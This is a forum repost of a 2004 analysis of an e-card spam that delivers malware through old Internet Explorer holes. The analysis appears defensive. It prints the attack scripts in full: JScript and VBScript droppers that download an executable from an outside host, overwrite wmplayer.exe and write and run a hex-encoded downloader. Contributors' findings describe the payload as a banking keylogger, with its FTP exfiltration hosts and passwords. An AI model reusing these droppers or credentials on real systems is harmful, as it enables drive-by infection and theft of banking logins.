Jump to content

Beware E-card Hijack Spam Scam


MikeHunt

Recommended Posts

E-card Hijack Spam

Introduction

I got an email on February 15th, 2004 telling me I had received an e-card from someone at 123greetings.com. The email looked a little bit suspicious, since the sender of the ecard ([email protected]) was someone I didn't recognize, and the URL to view the card showed the root domain of 123greetings.com. However, being the lonely geek I am, I clicked on the link hoping that I had a secret admirer who had emailed me a card for valentines day...

The page opened in my browser, but nothing happened. Lucky for me, I wasn't using Internet Explorer so I was saved. A closer look at the email and URL revealed the following:

It has been pointed out to me that the email says that you sent a card, not received one. I should have noticed this and realized I hadn't sent any cards to anyone.

The E-mail

There are several things to notice about the following email. Starting at the beginning, the email was sent from a DSL account in Poland - definitely did not come from the 123greetings.com servers. The from, reply-to, sender and return-path headers are obviously fake.

A comment in the HTML content of the email shows that it was saved from http://d40921.u24.whp-server.com/card.htm, where a copy of what is presumably the original email still exists. The title tag is set to "Untitled Document", and a META tag indicates that the html was generated using a microsoft product.

The URL view-source:http://210.192.42.34/img/ [warning, don't click unless you know what you're doing] appears through the rest of the email. All the links have been changed to point to this URL, and a 0x0 iframe at the end of the email also opens it up.

From [email protected] Sun Feb 15 11:13:52 2004

Return-Path:

Delivered-To: MYEMAIL

Received: from localhost (localhost [127.0.0.1]) by mail.tjhsst.edu

(Postfix) with ESMTP id 99462A2C1A for ; Sun, 15 Feb

2004 11:13:52 -0500 (EST)

Received: from mail.tjhsst.edu ([127.0.0.1]) by localhost (macaroni

[127.0.0.1]) (amavisd-new, port 20025) with ESMTP id 01846-06 for

; Sun, 15 Feb 2004 11:13:52 -0500 (EST)

Received: from mail.zoneedit.com (mail.zoneedit.com [209.152.174.160]) by

mail.tjhsst.edu (Postfix) with ESMTP id AF227A2C19 for ;

Sun, 15 Feb 2004 11:13:51 -0500 (EST)

Received: from compuserve.com (rk160.neoplus.adsl.tpnet.pl [80.50.83.160])

by mail.zoneedit.com (Postfix) with SMTP id C84213EBB8 for

; Sun, 15 Feb 2004 11:13:48 -0500 (EST)

Date: Sun, 15 Feb 2004 16:16:50 +0000

From: Ecard

Subject: You have received E-card at 123Greetings.com

To: ME

Message-ID:

Reply-To: Ecard

Sender: Ecard

MIME-Version: 1.0

Content-Type: text/html; charset=Windows-1251

X-Virus-Scanned: by amavisd-new-20030616-p5 (Debian) at macaroni

X-Spam-Status: No, hits=4.3 tagged_above=2.0 required=6.3 tests=HTML_30_40,

HTML_COMMENT_SAVED_URL, HTML_MESSAGE, HTML_RELAYING_FRAME,

HTML_TITLE_UNTITLED, MIME_HTML_ONLY, NORMAL_HTTP_TO_IP,

RCVD_FAKE_HELO_DOTCOM

X-Spam-Level: ****

Content-Transfer-Encoding: 8bit

<!-- saved from url=(0041)http://d40921.u24.whp-server.com/card.htm -->

Untitled Document

Dear Admirer,

Your e-card has been sent to My... at [email protected]

123Greetings.com is all about touching lives, bridging distances, healing rifts

and building bonds. We have a gallery of e-cards for almost every occasion of

life. Express yourself to your friends and family by sending Free e-cards from

our site with your choice of colors, words and music.

Your e-card will be available with us for the next 30 days. If you wish to keep

the e-card longer, you may save it on your computer or take a print.

To view a copy of the e-card you have sent, choose from any of the following

options:

--------

OPTION 1

--------

Click on the following Internet address or

copy & paste it into your browser's address box.

http://www.123greetings.com/

--------

OPTION 2

--------

Copy & paste the e-card number in the "View Your Card" box at

http://ww.123greetings.com/

Your e-card number is

7CU20121085738151

If you need help in viewing your e-card or any other assistance,

please visit our Help / FAQ section located at

http://ww.123greetings.com/help/

If you need further help, feel free to write to us at

mailto:%[email protected]

Best wishes,

Postmaster,

123Greetings.com

*If you would like to send someone an e-card, you can do so at

http://ww.123greetings.com/

The Offending URL

The URL, whose HTML source is reproduced below, does some really nasty stuff. Using iframes, object tags and javascript, it opens up several other files, which are explained later on, from the server:

* view-source:http://210.192.42.34/img/spy.htm

* view-source:http://210.192.42.34/img/start.html

* view-source:http://210.192.42.34/img/ro.htm

* view-source:http://210.192.42.34/img/1.php

In addition to opening other URLs, the page also does its own share of nasty things. It includes a hidden textarea which contains ActiveX to download a certain a.exe, and overwrite the Windows Media Player wmplayer.exe with it. Once the file has been replaced, IE is redirected to the mms://, which causes the invocation of wmplayer.exe. The code in this textarea is processed by some javascript after a 5 second timeout, and is run in Internet Explorer's 'Media Sidebar'. Before this 5 second timeout, however, a fake url, error.jsp, is opened in the media sidebar to throw off the user.

var x = new ActiveXObject("Microsoft.XMLHTTP");

x.Open("GET", "http://adversting.co.uk/a.exe",0);

x.Send();

var s = new ActiveXObject("ADODB.Stream");

s.Mode = 3;

s.Type = 1;

s.Open();

s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);

location.href = "mms://";

<script language="javascript">

function preparecode(code) {

result = '';

lines = code.split(/\r\n/);

for (i=0;i

line = lines;

line = line.replace(/^\s+/,"");

line = line.replace(/\s+$/,"");

line = line.replace(/'/g,"\\'");

line = line.replace(/[\\]/g,"\\\\");

line = line.replace(/[/]/g,"%2f");

if (line != '') {

result += line +'\\r\\n';

}

}

return result;

}

function doit() {

mycode = preparecode(document.all.code.value);

myURL = "file:java script:eval('" + mycode + "')";

window.open(myURL,"_media")

}

window.open("error.jsp","_media");

setTimeout("doit()", 5000);

spy.htm - I wonder what this does?

Despite its malicous sounding name, all this file contains is the tracking code provided by a russian company, spylog.com. I couldn't figure out how to view the stats that are being compiled by spylog, but the author no doubt has access to these stats and can use them to figure out how many computers he has hijacked.

<!-- SpyLOG f:0211 -->

<script language="javascript"><!--

Mu="u5327.08.spylog.com";Md=document;Mnv=navigator;Mp=0;

Md.cookie="b=b";Mc=0;if(Md.cookie)Mc=1;Mrn=Math.random();

Mn=(Mnv.appName.substring(0,2)=="Mi")?0:1;Mt=(new Date()).getTimezoneOffset();

Mz="p="+Mp+"&rn="+Mrn+"&c="+Mc+"&t="+Mt;

if(self!=top){Mfr=1;}else{Mfr=0;}Msl="1.0";

//--><script language="javascript1.1"><!--

Mpl="";Msl="1.1";Mj = (Mnv.javaEnabled()?"Y":"N");Mz+='&j='+Mj;

//--><script language="javascript1.2"><!--

Msl="1.2";Ms=screen;Mpx=(Mn==0)?Ms.colorDepth:Ms.pixelDepth;

Mz+="&wh="+Ms.width+'x'+Ms.height+"&px="+Mpx;

//--><script language="javascript1.3"><!--

Msl="1.3";//--><script language="javascript"><!--

My="";My+="";

My+="http:";

My+="";Md.write(My);//-->

cnt?cid=532708&p=0

<!-- SpyLOG -->

start.html - The file that ran away

Presumably, this file actually existed at one point, and did something (maybe changed the browsers start page?), but it no longer exists.

<em>404 Not Found</em>

Not Found

The requested URL /img/start.html was not found on this server.


Apache/1.3.12 Server at panda.coventive.com Port 80

ro.html - Remote execution

The author tries yet another IE exploit to run a.exe remotely.

<script>

WaitForDocumentCached_TIME=100;

function LaunchRemoteExe_Step2()

{

//One more fresh action is present for more stable performance

for(i=1;i

w.document.execCommand("Refresh");

}

function LaunchRemoteExe(ExeUrl)

{

w=window.open("about:blank","_blank","width=300 height=400 resizable=yes location=yes");

w.document.write("

CLASSID='CLSID:11111111-1111-1111-1111-111111111113'

CODEBASE='mhtml:file://C:\NO_SUCH_MHT.MHT!" + ExeUrl + "'>");

setTimeout("LaunchRemoteExe_Step2()",WaitForDocumentCached_TIME);

}

LaunchRemoteExe("http://adversting.co.uk/a.exe")

HijackClickV2-MyPage

1.php - Last Attempt

1.php tries one last method to run a.exe. The file contains vbscript code, but probably uses php so that it can send a 'application/hta' content-type header. The encoded vbscript has been removed (view it at view-source:http://210.192.42.34/img/1.php) and replaced with the deocded version of the code.

The vbscript code contains strings which represent, in hex, the binary contents of a certain executable which is saved as x.exe. Once saved, this executable is launched with the url to a.exe as an argument.

<script language=vbs>

szURL = "http://adversting.co.uk/a.exe"

<script language="VBScript.Encode">

szZeroLine =

"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"

szBinary = ""

szBinary = szBinary &

"4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000"

szBinary = szBinary &

"000000000000000000000000B80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F"

szBinary = szBinary &

"742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000005D87017219E66F2119E66F2119E66F21"

szBinary = szBinary &

"97F97C2112E66F21E5C67D2118E66F215269636819E66F2100000000000000000000000000000000504500004C010300"

szBinary = szBinary &

"AB93493F0000000000000000E0000F010B01050C00020000000400000000000000100000001000000020000000004000"

szBinary = szBinary &

"001000000002000004000000000000000400000000000000004000000004000000000000020000000000100000100000"

szBinary = szBinary &

"000010000010000000000000100000000000000000000000182000002800000000000000000000000000000000000000"

szBinary = szBinary & szZeroLine

szBinary = szBinary &

"2E7465787400000064000000001000000002000000040000000000000000000000000000200000602E72646174610000"

szBinary = szBinary &

"BE000000002000000002000000060000000000000000000000000000400000402E646174610000002700000000300000"

szBinary = szBinary &

"0002000000080000000000000000000000000000400000C0000000000000000000000000000000000000000000000000"

szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &

szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine

szBinary = szBinary &

"00000000000000000000000000000000E8470000006683C00A8D08516800304000E842000000680B30400050E8310000"

szBinary = szBinary &

"00596A006A008D1D1E30400053516A00FFD06A01681E304000E8200000006A00E801000000CCFF2510204000FF250020"

szBinary = szBinary &

"4000FF2504204000FF2508204000FF250C20400000000000000000000000000000000000000000000000000000000000"

szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &

szZeroLine & szZeroLine & szZeroLine & szZeroLine

szBinary = szBinary &

"66200000782000008A2000009A2000005820000000000000402000000000000000000000A42000000020000000000000"

szBinary = szBinary &

"0000000000000000000000000000000066200000782000008A2000009A20000058200000000000008000457869745072"

szBinary = szBinary &

"6F6365737300C800476574436F6D6D616E644C696E6541001F0147657450726F63416464726573730000A4014C6F6164"

szBinary = szBinary &

"4C696272617279410000940257696E45786563006B65726E656C33322E646C6C00007573657233322E646C6C00000000"

szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &

szZeroLine & szZeroLine

szBinary = szBinary &

"000000000000000000000000000000000000000000000000000000000000000075726C6D6F6E2E646C6C0055524C446F"

szBinary = szBinary &

"776E6C6F6164546F46696C654100633A5C792E6578650000000000000000000000000000000000000000000000000000"

szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &

szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine

szBinary = szBinary & "00000000000000000000000000000000"

szApplication = "c:\x.exe"

Set hFSO = CreateObject("Scripting.FileSystemObject")

Set hFile = hFSO.CreateTextFile(szApplication, ForWriting)

intLength = len(szBinary)

intPosition = 1

while intPosition

char = Int("&H" & Mid(szBinary, intPosition, 2))

hFile.Write(Chr(char))

intPosition = intPosition+2

wend

hFile.Close

Set hShell=CreateObject("WScript.Shell")

hShell.run(szApplication+" "+szURL)

%>

x.exe - The Accomplice

I don't have a windows machine, and don't particularly want to run this and the other executable on one. If someone wants to investigate, feel free, and be sure to email me anything you find so that I can update this page.

Feb 16th, 12PM: According to Robert Myers, x.exe isn't a valid Windows executable, and doesn't run properly on either XP or 98. Looking at the raw binary, the intent is to simply download the URL given on the command line and execute it. It should download a.exe, call it c:\y.exe and run it.

Feb 16th, 3PM: Slashdot reader James Sneeringer emailed me the following update:

As you know, 1.php decodes into x.exe. It's quite small, only 2512 bytes.

When run, it evidently attempts to download whatever URL is passed to it,

(using URLDownloadToFileA()) and saves it to c:\y.exe, when tries to run

it (using WinExec()). So x.exe downloads a.exe as y.exe and runs it.

I obtained a.exe from the URL in 1.php, http://adversting.co.uk/a.exe.

The a.exe file appears to be a keylogger, as the string "key.log" is

contained in it. It contains calls to RegCreateKeyExA(), MessageBoxA(),

and InternetOpenA(), so it probably does the usual trojan/worm thing...

ensures it starts up on reboot, prints misleading error messages, phones

home, etc.

I have not run any of these programs. I have only analyzed them on a

Linux system using the strings command. I did copy a.exe to a Windows

system running Norton AntiVirus, but it didn't flag it as any known Trojan

or SpyWare. I obtained x.exe by converting the VBScript code to perl. I

hope this helps.

a.exe - Final Destination

Feb 16th, 3:30PM: I've gotten several emails providing information about a.exe (md5sum e8262377158e2b0b3932292f49fd23a6).

Robert Myers reports that the exe has references to spy.dll and keylg.dll

John reports:

I analyzed the a.exe and found disturbing info:

it is after banks, as described in an unpacked version (the file is

compacted). Bank list is as

follows:

hangseng.HSBC.bank.PIN.ufjbank.smbc.co.jp.btm.co.jp.

rhbbank.com.ambg.com.my.affinbank.com.my.publicbank.com.my.

Shinsei.jbic.go.jp.boj.or.jp.sanwabank.co.jp.stormpay.com.

ccbusa.com.goldmoney.e-gold.e-bullion.tradeodds.com.

datek.betonmarket.com.evocash.bancaja.es.santandercentralhispano.es.

bancopopular.es.cajamadrid.es.caixapenedes.es.caixamanresa.es.

caixatarragona.es.cme.com.fxall.com.

bank.banc.e-gold.evocash.e-bullion.hangseng.HSBC.PIN.smbc.co.jp.

btm.co.jp.rhbbank.com.ambg.com.my.Shinsei.jbic.go.jp.jbic.go.jp.

stormpay.com.ccbusa.com.goldmoney.tradeodds.com.datek.betonmarket.com.

santandercentralhispano.es.cajamadrid.es.caixapenedes.es.caixamanresa.es.

caixatarragona.es.bot.or.th.banque.bnm.gov.my.dnb.nl.

bundesbank.de.TAN.ecb.int.mas.gov.sg.snb.ch.federalreserve.gov.

abnamro.com.aib.ie.bnl.it.ingbarings.com.bankofamerica.com.

bmonesbittburns.com.barcap.com.bearstearns.com.bnpparibas.com.

chase.com.consors.de.ca-indosuez.com.creditlyonnais.com.csfb.com.

firstunion.com.intesabci.it.jp morgan.com.leuveninc.com.ldc.co.uk.

nabmarkets.com.nomura.com.rbsmarkets.com.sakura.co.jp.

salomonsmithbarney.com.scotiacapital.com.sg-ib.com.standardchartered.com.

smbc.co.jp.csweb.co.jp.td.com.travelex.com.ubs.com.wachovia.com.

wellsfargo.com.westlbmarkets.net.saxobank.com.e-trade.admin.clearstation.com.

daytraders.com.decisionpoint.com.earningswhispers.com.investools.com.

nni.nikkei.co.jp.stockwinners.com.tradetrek.com.brownco-apply.com.

schwabtrader.com.processrequest.com.anz.com.olb.westpac.commbank.com.au.

ambg.com.my.bpm.com.my.bcb.com.my.hhb.com.my.borneo-online.com.my.rba.gov.au.

panamaoffshore.com.eib.org.offshore.53.com.amex.com.money.net.st.rim.or.jp.

meigin.com.it-okinawa.or.jp.chb.com.tw.www2.japanexim.go.jp.www.gs.com.

juroku.co.jp.iijnet.or.jp.mitsubishi-trust.co.jp.msdw.co.jp.ncb.co.jp.

hirogin.co.jp.clariden.com.dahsing.com.hk.iba.com.hk.worldsec.com.

unicredito.it.rzb.at.mevas.com.ibnk.bcif.fr.rzb.at.smc.fr.

www.socgen.com.www.westlb.com.www.boh.com.cib.ibanking-services.com.

internetonline2.com.agrolink.moa.my.maybank2u.com.my.bankrakyat.com.

my.nwabank.co.jp.ufjbank.parex.ogress.banco

The files it installs are:

C:\WINDOWS\SYSTEM\~key.log keylogging file ?

C:\WINDOWS\SYSTEM\~post.log other post file ?

Files it refers to:

spy.dll

klgd.dll

Interesting info about the author:

g:\!Work\__Current\$0000_FHooker_Chazer\Release\TrojWithHooker.pdb

g:\!Work\__Current\$0000_FHooker_Chazer\Dll\Release\DLL.pdb

ProgLib.dll._Prog_HookAllApps@12

MoneyFtp (???)

The information (logfiles) is send out to an FTP site that is UP as of yet.

I informed the abuse department of the hosters of the FTP site and am giving

them a chance to shut it down. It is not yet wise to include this particular

information on your site, as there could be consequences for the people

whose log is already collected.

And Jack emailed me:

I downloaded a.exe out of curiousity, and have been analysing it. The file

contains a number of very interesting strings, which make it quite obvious

that this program attempts to hijack the user's personal login information

as they log in to various popular Internet banking services.

The strings are (trivially) encrypted. However, once every character in a.exe

is XOR'ed with 255, they appear. I have listed them below.

Of particular interest are the five at the top. Seems as if the details

are uploaded to one of two FTP sites, and the exploit may affect people using

Opera as well as IE.

64.191.23.212 21 ircd thepassw0rd https

http

Internet Explorer

Opera

69.93.102.218 21 logi bbzaza123 hangseng

HSBC

bank

ufjbank

smbc.co.jp

btm.co.jp

rhbbank.com

ambg.com.my

affinbank.com.my

publicbank.com.my

Shinsei

jbic.go.jp

boj.or.jp

sanwabank.co.jp

stormpay.com

ccbusa.com

goldmoney

... continues in similar vein, with 152 more strings.

I have found this very scary. I cannot believe how openly malicious this

program actually is.

adversting.co.uk - Look, it's misspelt

Feb 16th, 12PM: Mike Richards did some research on the domain that a.exe is being pulled from. Here's what he found:

The site is registered in the UK and points to another mass marketing company called trafficdiscount.com. They are located in the US and their registration details are:

Registrant Name: Daniel Belcher

Registrant Organization: Slick Website Development

Registrant Address: 1111 Kathryn Rd.

Registrant City: Mt. Juliet

Registrant State/Province: TN

Registrant Postal Code: 37122

Registrant Country: US

Registrant Phone Number: +61.54434190

Registrant Fax Number: +.

Registrant Email: [email protected]

They are currently providing services through Wiltel.

Conclusion

If you're still using Outlook and Internet Explorer, this is a good time to find alternatives (I suggest FireFox and Thunderbird). Crackers and spammers are getting more and more sophisticated, and are finding ways to fool even experienced and skilled computer users.

This page was created in vim by Aman Gupta with no crazy standards compliance in mind, but rather a desire to write clean, readable and well organized HTML using CSS to make the page look presentable.

Link to comment
Share on other sites

Anybody know how to change the smtp server in thunderbird?? It's in the advanced tab in 'server settings' for the mail account but doesn't seem to have an option for adding a new one. Heyulp!

Edit: oops ! meant to post that in tech talk ... soz

Link to comment
Share on other sites

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Our picks

    • Wait, Burning Man is going online-only? What does that even look like?
      You could have been forgiven for missing the announcement that actual physical Burning Man has been canceled for this year, if not next. Firstly, the nonprofit Burning Man organization, known affectionately to insiders as the Borg, posted it after 5 p.m. PT Friday. That, even in the COVID-19 era, is the traditional time to push out news when you don't want much media attention. 
      But secondly, you may have missed its cancellation because the Borg is being careful not to use the C-word. The announcement was neutrally titled "The Burning Man Multiverse in 2020." Even as it offers refunds to early ticket buyers, considers layoffs and other belt-tightening measures, and can't even commit to a physical event in 2021, the Borg is making lemonade by focusing on an online-only version of Black Rock City this coming August.    Read more...
      More about Burning Man, Tech, Web Culture, and Live EventsView the full article
      • 0 replies
    • Post in What Are You Listening To?
      Post in What Are You Listening To?
    • Post in What Are You Listening To?
      Post in What Are You Listening To?
    • Post in What Are You Listening To?
      Post in What Are You Listening To?
    • Post in What Are You Listening To?
      Post in What Are You Listening To?
×
×
  • Create New...